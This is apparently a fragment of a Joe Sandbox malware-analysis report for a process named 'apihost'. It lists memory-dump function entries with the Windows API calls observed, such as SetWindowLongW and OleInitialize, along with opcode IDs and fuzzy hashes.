                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 831106B58002499FDB10DF9AD989BDEBBF8EB48324F10841AE954A7741C374A944CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,FFFFFFF4,?), ref: 06454115
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                                                                                      • Opcode ID: f8b6cebf9f56f37a8e462f2a032d63ec73014ae34126dc933f4cbf8b0002a45c
                                                                                                                                                                                                                                      • Instruction ID: 50355eacd15b6ccec0ce34fbe75b4246e02330da00c08d85d9f061d9a0eb7f2d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8b6cebf9f56f37a8e462f2a032d63ec73014ae34126dc933f4cbf8b0002a45c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 521106B5800248DFDB10DF9AD589BDEBBF8EB48324F10841AE958A7301D375A944CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02E8D67E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2959933543.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E80000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2e80000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                                      • Opcode ID: d1a319269fb41a5faeaeed3f90dd244728b977e4c8d079e8b1d6863c7b19e1fa
                                                                                                                                                                                                                                      • Instruction ID: 1f67e72cf70d75fcceec7bdc854e2f13158494a1e770e73298de09d23782b9c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a319269fb41a5faeaeed3f90dd244728b977e4c8d079e8b1d6863c7b19e1fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F11DFB5D002498FCB10DFAAD844ADEFBF4EF88228F10846AD469A7250C379A545CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 0645FCCD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2982246712.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_6450000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                      • Opcode ID: 3687779210caa6b3eb9edf14fb44cfd053b6b963c401334d6e9d0f82d609b99b
                                                                                                                                                                                                                                      • Instruction ID: 77ea4418865bb2e771d2d358475bccc63c767a3369203c7d55b605f31652ff19
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3687779210caa6b3eb9edf14fb44cfd053b6b963c401334d6e9d0f82d609b99b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 571106B5800259CFCB11CF99D585BDEBBF8FB08324F10841AE958A7240C374A544CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 064C319D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2983677734.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_64c0000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Initialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                                                                                                                      • Opcode ID: 491a8b5b26b0b2555e00d8f70a5fb45e172337ad621caec77d4a947511d9bb1e
                                                                                                                                                                                                                                      • Instruction ID: 4fb762b791f484054b7214638c0a19c88e3411ea72f2b9ea0f53296ff8f5f162
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 491a8b5b26b0b2555e00d8f70a5fb45e172337ad621caec77d4a947511d9bb1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F711FEB59002488FCB60DF9AD549B9EBBF4EB48224F20845AE519A7310C775A944CFA5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 064C319D
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2983677734.00000000064C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064C0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_64c0000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Initialize
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2538663250-0
                                                                                                                                                                                                                                      • Opcode ID: fc7c387dffeac78d33a4a12d7052399323d5c2cf5e95209251f00dcc475f1371
                                                                                                                                                                                                                                      • Instruction ID: 050bf2fed8b321693a922a6b7c97067692a4ec60dfea0f187583fd10f8ad1d8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc7c387dffeac78d33a4a12d7052399323d5c2cf5e95209251f00dcc475f1371
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 841112B5D002588FCB60DF99D589BDEBFF4EB08324F24845AD559A7310C778A944CFA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2957282116.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2dbd000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b40bc155476c783abe16bade407085d2520815988e2c89ca282a5b5d925e1eca
                                                                                                                                                                                                                                      • Instruction ID: dad9345cfd2ef5f21d7ef5aaa000d57a232828395c81bbcb99c5037c15ad8922
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b40bc155476c783abe16bade407085d2520815988e2c89ca282a5b5d925e1eca
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA212F71604200DFDB16DF24D994B66BFA6EF88314F30C5A9E84A4B396C33AD847CA61
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2957282116.0000000002DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DBD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2dbd000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c42245088077fe76f22c7346d8a6e54441c4f8338abbedcb3a3a7c12f78c7054
                                                                                                                                                                                                                                      • Instruction ID: e4bbf03e80901c0e43aeb95aa0397c971d5091e4066f6e38ab2819c16aa85c33
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c42245088077fe76f22c7346d8a6e54441c4f8338abbedcb3a3a7c12f78c7054
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5217F75509380CFCB03CF24D594755BF72EF46214F28C5DAD8498B2A7C33A980ACB62
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2956707395.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2dad000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4dfd2e401286def5e5ead400985b79a03394cc6e8e7a495061da5fe17845ee95
                                                                                                                                                                                                                                      • Instruction ID: a11ed87ab853833eb27783876a530a471c189aef2c6c664f12654d28807b17a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dfd2e401286def5e5ead400985b79a03394cc6e8e7a495061da5fe17845ee95
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B701F2310083409EE7209A29CD94F67BF99EF41724F28C42AED580A786C779DC41CA75
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000023.00000002.2956707395.0000000002DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DAD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_35_2_2dad000_apihost.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f1249f9f55cf61db90633e93e2aacf85741777b0d52296d6cc3113aee86231f8
                                                                                                                                                                                                                                      • Instruction ID: e9e492f7fc2acdd70caf2944b45db3c0444fda5861942abe06b000fc150dbf0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1249f9f55cf61db90633e93e2aacf85741777b0d52296d6cc3113aee86231f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF062714043449EE7108A16D884B62FFA8EF41674F28C45AED585A686C3799C45CA75